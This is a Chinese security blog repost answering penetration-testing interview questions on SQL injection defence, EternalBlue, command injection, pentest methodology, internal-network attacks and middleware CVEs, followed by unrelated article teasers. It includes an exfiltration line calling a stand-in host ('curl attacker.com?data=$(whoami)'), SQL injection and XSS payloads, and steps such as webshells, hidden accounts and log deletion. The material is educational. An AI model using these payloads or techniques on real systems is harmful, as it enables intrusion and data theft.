安全领域各种资源,学习文档,以及工具分享、前沿信息分享、POC、EXP分享。不定期分享各种好玩的项目及好用的工具,欢迎关注。

1、SQL注入的防护方法有哪些?
2、永恒之蓝的漏洞原理是什么?怎么做到的?
3、命令注入有哪些?
4、给你一个目标网站,你该如何进行测试?
5、给你一个后台登陆地点的网站,你能从中发现那些问题?
6、给你一千台服务器和交换机,你会如何进行扫描?
7、内网渗透了解多少?
8、中间件有哪些?
9、中间件有哪些已知的漏洞?

1. SQL注入防护方法

核心原则:数据与代码分离

  • 参数化查询(Prepared Statements)
    使用占位符(如?@param)替代拼接SQL,数据库区分指令与数据(如Java的PreparedStatement、Python的cursor.execute() )。
  • 输入过滤与白名单校验
    对用户输入进行类型/长度约束(如仅允许邮箱格式),禁用高危字符(';--)。
  • 最小权限原则
    数据库账户仅赋予必要权限(禁用DROPFILE等)。
  • ORM框架使用
    Hibernate、Entity Framework等自动转义输入。
  • Web应用防火墙(WAF)
    部署ModSecurity等规则引擎拦截注入特征(如UNION SELECT)。
  • 错误信息屏蔽
    避免数据库报错信息直接返回前端。

2. 永恒之蓝(EternalBlue)漏洞原理

CVE编号:CVE-2017-0144
漏洞根源:SMBv1协议处理SMBv1 Trans2请求的缓冲区溢出漏洞。
攻击流程

  1. 畸形数据包触发溢出
    攻击者发送特制的SMB_COM_TRANSACTION2请求,覆盖内核内存。
  2. 内核权限执行Shellcode
    利用溢出覆盖函数指针,执行攻击者代码(如NSA开发的DoublePulsar后门)。
  3. 横向传播
    通过SMB协议在内网自动扩散(如WannaCry勒索病毒)。
    修复方案
    禁用SMBv1,安装MS17-010补丁,关闭445端口。

3. 命令注入类型与案例

分类方式

  • 直接命令注入
    用户输入直接拼接至系统命令(如os.system("ping " + user_input)),可通过;&|执行多条命令。
  • 间接注入(如环境变量污染)
    篡改PATHLD_PRELOAD劫持动态链接库。
  • 盲注(无回显)
    通过时间延迟(sleep 5)或DNS外带数据(curl attacker.com?data=$(whoami) )判断结果。
    高危函数
    PHP的system()/exec()、Python的os.popen() 、Node.js 的child_process.exec()

4. 目标网站渗透测试流程

分阶段方法论

阶段关键操作
信息收集WHOIS查询、子域名爆破(Amass)、端口扫描(Nmap)、框架指纹识别(Wappalyzer)
漏洞扫描自动化工具(Burp Suite、Nessus) + 手动验证(如修改参数、边界值测试)
漏洞利用SQL注入工具(sqlmap)、XSS载荷测试、文件上传绕过(Content-Type欺骗)
权限提升利用系统/服务漏洞提权(如Dirty Pipe)、数据库弱口令爆破
权限维持植入Webshell(蚁剑/冰蝎)、创建隐藏账户、SSH密钥后门
内网横向移动ARP欺骗、Pass-the-Hash攻击、域渗透(BloodHound分析)
痕迹清理删除日志(/var/log/)、隐藏进程(rootkit)

5. 后台登录点安全审计要点

  • 认证机制缺陷
    • 弱口令(admin/admin123)
    • 无验证码或验证码可绕过(OCR识别、重复使用)
    • 未限制登录尝试频率(爆破漏洞)
  • 传输与存储风险
    • HTTP明文传输密码(应强制HTTPS)
    • Cookie未设置HttpOnly(XSS窃取会话)
  • 逻辑漏洞
    • 响应差异暴露用户存在性(枚举用户名)
    • 密码重置功能缺陷(Token未绑定用户、可预测Token)
  • 注入漏洞
    • SQL注入(' OR 1=1 --
    • XSS注入(登录表单插入<script>alert(1)</script>

6. 千台服务器/交换机扫描策略

分布式架构设计

mermaigraph LR A[控制节点] --> B[任务队列 Kafka/RabbitMQ] B --> C[扫描节点1-N] C --> D[结果存储 ES]

关键技术点

  • IP分段与负载均衡
    使用nmap -sS -iL targets.txt -oA scan --max-rate 1000分批次扫描,避免流量洪峰。
  • 指纹识别优化
    并行化服务识别(-sV)与OS探测(-O)。
  • 交换机特殊处理
    SNMP扫描(snmpwalk)、ARP扫描(netdiscover),避开ICMP限制。
  • 结果聚合
    通过Elasticsearch + Kibana可视化漏洞分布。

7. 内网渗透核心技术

攻击链关键步骤

  1. 信息收集
    ARP扫描、NetBIOS枚举、域控制器定位(nltest /dclist)。
  2. 权限提升
    本地提权(CVE-2021-4034)、凭证窃取(Mimikatz抓取LSASS内存)。
  3. 横向移动
    • 协议利用:SMB爆破(CrackMapExec)、WinRM远程执行
    • 中间人攻击:LLMNR/NBT-NS投毒(Responder)
    • 域渗透:黄金票据伪造、DCSync攻击获取域控权限
  4. 数据窃取与持久化
    隐蔽隧道(DNS/ICMP)、GPO组策略后门。

8. 常见中间件列表

类型代表产品
Web服务器Apache、Nginx、IIS
应用服务器Tomcat、WebLogic、JBoss/WildFly
反向代理Traefik、HAProxy
消息队列RabbitMQ、Kafka、ActiveMQ
API网关Kong、Tyk

9. 中间件经典漏洞案例

中间件漏洞影响
ApacheCVE-2021-41773(路径遍历)读取服务器敏感文件
NginxCVE-2013-2028(栈溢出)远程代码执行(RCE)
TomcatCVE-2020-1938(Ghostcat)AJP协议文件读取/RCE
WebLogicCVE-2020-14882(未授权命令执行)控制服务器
JBossJMXInvokerServlet 反序列化远程代码执行

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。
如若转载,请注明出处:http://www.pswp.cn/pingmian/95639.shtml
繁体地址,请注明出处:http://hk.pswp.cn/pingmian/95639.shtml
英文地址,请注明出处:http://en.pswp.cn/pingmian/95639.shtml

如若内容造成侵权/违法违规/事实不符,请联系英文站点网进行投诉反馈email:809451989@qq.com,一经查实,立即删除!

相关文章

安卓学习 之 按钮点击事件

今天学习安卓应用中的按钮点击事件&#xff1a;总结下来在安卓应用中的Button注册点击事件的方法主要是以下4种方法&#xff0c;稍后会逐个介绍&#xff1a; 第一种方法&#xff1a;自定义内部类的方法 第二种方法&#xff1a;匿名内部类的方法 第三种方法&#xff1a;当前Acti…

鸿蒙NEXT主题设置指南:应用级与页面级主题定制详解

在鸿蒙应用开发中&#xff0c;灵活的主题设置能力是实现个性化用户体验的关键技术&#xff0c;HarmonyOS NEXT提供了强大而灵活的主题设置功能&#xff0c;让开发者能够轻松实现应用级和页面级的主题定制。在当今追求个性化的时代&#xff0c;用户希望应用能够根据自己的喜好呈…

全球汽车氮化镓技术市场规模将于2031年增长至180.5亿美元,2025-2031年复合增长率达94.3%,由Infineon和Navitas驱动

全球汽车氮化镓技术市场规模将于2031年增长至180.5亿美元&#xff0c;2025-2031年复合增长率达94.3%&#xff0c;由Infineon和Navitas驱动汽车氮化镓技术正从一个有前景的细分市场加速进入主流电力电子领域。根据QYResearch&#xff08;恒州博智&#xff09;的《全球汽车GaN技术…

xftp断网后提示错误如何继续下载?

问题&#xff1a;xftp断网后提示错误如何继续下载&#xff1f;解决方法&#xff1a;断网后&#xff0c;先连接上网&#xff0c;然后继续双击右侧的那两个要传输的文件&#xff0c;然后会弹出一个覆盖还是继续下载&#xff08;如下图&#xff09;的选择框&#xff0c;选择继续下…

Day22_【机器学习—集成学习(4)—Boosting—GBDT算法】

提升树 &#xff08;Boosting Decision Tree &#xff09;每一个弱学习器通过拟合残差来构建强学习器梯度提升树 &#xff08;Gradient Boosting Decision Tree&#xff09;每一个弱学习器通过拟合负梯度来构建强学习器一、提升树残差数学公式为&#xff1a;残差真实值−预测值…

前缀和、子矩阵的和;差分、差分矩阵

一、前缀和数组要稍微注意前缀和数组从1开始#include <iostream>using namespace std;const int N 100010;int n, m; int a[N], s[N];int main() {scanf("%d%d", &n, &m);for (int i 1; i < n; i ) scanf("%d", &a[i]);for (int i…

启用BBR拥塞控制算法

目录 &#x1f4cb; 先决条件 &#x1f527; 启用步骤 &#x1f4dd; 额外检查与说明 ⚠️ 注意事项 BBR&#xff08;Bottleneck Bandwidth and Round-trip time&#xff09;是谷歌开发的一种TCP拥塞控制算法&#xff0c;它能有效提升网络传输速度和性能&#xff0c;尤其在…

Python:AI开发第一语言的全面剖析

文章目录引言1. Python的历史与AI开发的契合1.1 Python的诞生与设计哲学1.2 Python与AI发展的历史交汇2. 语言特性如何支持AI开发2.1 动态类型与交互式编程2.2 简洁优雅的语法2.3 高级数据结构的原生支持2.4 函数式编程特性2.5 强大的元编程能力3. 丰富的AI生态系统和库支持3.1…

Nikto 漏洞扫描工具使用指南

目录 ✨ 核心功能一览 &#x1f680; 基本使用方法 1. 扫描单个目标 2. 指定端口扫描 3. 扫描 HTTPS 目标 使用 -ssl 参数主要有两个核心原因 ⚙️ 高级使用技巧 1. 使用代理扫描 2. 保存扫描结果 3. 使用特定插件 4.交互命令 ✨ 核心功能一览 Nikto 是一款开源的 W…

FunASR的Java实现Paraformer实时语音识别 | 一款无需联网的本地实时字幕软件

0. 开发背景 我们在看直播时&#xff0c;没有视频字幕&#xff0c;可能看惯了视频字幕&#xff0c;来到直播中缺少字幕会感觉不习惯&#xff0c;特别是对于听力障碍的人群&#xff0c;只能依赖于字幕&#xff0c;那么这个软件可以解决直播&#xff0c;在线会议等场景中无字幕的…

从机器学习的角度实现 excel 中趋势线:揭秘梯度下降过程

1. 引言&#xff1a;Excel 的“一键魔法”背后藏着什么智慧&#xff1f;在 Excel 中&#xff0c;我们只需右键 → 添加趋势线&#xff0c;一条完美的直线就出现了。它快得像魔法&#xff0c;但魔法背后&#xff0c;是数学的严谨。今天&#xff0c;我们不关心 Excel 内部用了什么…

关于上拉电阻

上拉电阻的作用&#xff1a;辅助浮空状态输出高电平 其实就是确定这根线的电平&#xff0c;不能让他处于一种未知的状态。 其次也可以起到限制电流的作用&#xff0c;防止损坏原件 那么上拉电阻如何取值&#xff1f; 首先来看一下驱动能力。 因为线上是一定有寄生电容的&am…

PiscCode构建Mediapipe 手势识别“剪刀石头布”小游戏

在计算机视觉与人机交互领域&#xff0c;手势识别是一个非常有趣的应用场景。本文将带你用 Mediapipe 和 Python 实现一个基于摄像头的手势识别“剪刀石头布”小游戏&#xff0c;并展示实时手势与游戏结果。 1. 项目概述 该小游戏能够实现&#xff1a; 实时检测手势&#xff0…

【VoNR】VoNR 不等于 VoLTE on 5G

博主未授权任何人或组织机构转载博主任何原创文章&#xff0c;感谢各位对原创的支持&#xff01; 博主链接 本人就职于国际知名终端厂商&#xff0c;负责modem芯片研发。 在5G早期负责终端数据业务层、核心网相关的开发工作&#xff0c;目前牵头6G技术研究。 博客内容主要围绕…

计算机网络:网络设备在OSI七层模型中的工作层次和传输协议

OSI七层模型&#xff08;物理层、数据链路层、网络层、传输层、会话层、表示层、应用层&#xff09;中&#xff0c;不同网络设备因功能不同&#xff0c;工作在不同层次。以下是典型网络设备的工作层次及核心功能&#xff1a;1. 物理层&#xff08;第1层&#xff09; 核心功能&a…

RSA-e和phi不互素

1.题目import gmpy2 import libnum p 1656713884642828937525841253265560295123546793973683682208576533764344166170780019002774068042673556637515136828403375582169041170690082676778939857272304925933251736030429644277439899845034340194709105071151095131704526…

基于单片机蒸汽压力检测/蒸汽余热回收

传送门 &#x1f449;&#x1f449;&#x1f449;&#x1f449;单片机作品题目速选一览表&#x1f680; &#x1f449;&#x1f449;&#x1f449;&#x1f449;单片机作品题目功能速览&#x1f680; &#x1f525;更多文章戳&#x1f449;小新单片机-CSDN博客&#x1f68…

https 协议与 wss 协议有什么不同

HTTPS 是用于网页数据传输的安全协议&#xff0c;而 WSS 是用于实时双向通信&#xff08;如聊天、直播&#xff09;的安全协议&#xff0c;二者的设计目标、应用场景、底层逻辑均存在本质区别。以下从 7 个核心维度展开对比&#xff0c;并补充关键关联知识&#xff0c;帮助彻底…

主流分布式数据库集群选型指南

以下是关于主流分布式可扩展数据库集群的详细解析&#xff0c;涵盖技术分类、代表产品及适用场景&#xff0c;帮助您高效选型&#xff1a;一、分布式数据库核心分类 1. NewSQL 数据库&#xff08;强一致性 分布式事务&#xff09;产品开发方核心特性适用场景TiDBPingCAPHTAP架…

#T1359. 围成面积

题目描述编程计算由“*”号围成的下列图形的面积。面积计算方法是统计*号所围成的闭合曲线中水平线和垂直线交点的数目。如下图所示&#xff0c;在1010的二维数组中&#xff0c;有“*”围住了15个点&#xff0c;因此面积为15。输入1010的图形。输出输出面积。样例输入数据 10 0…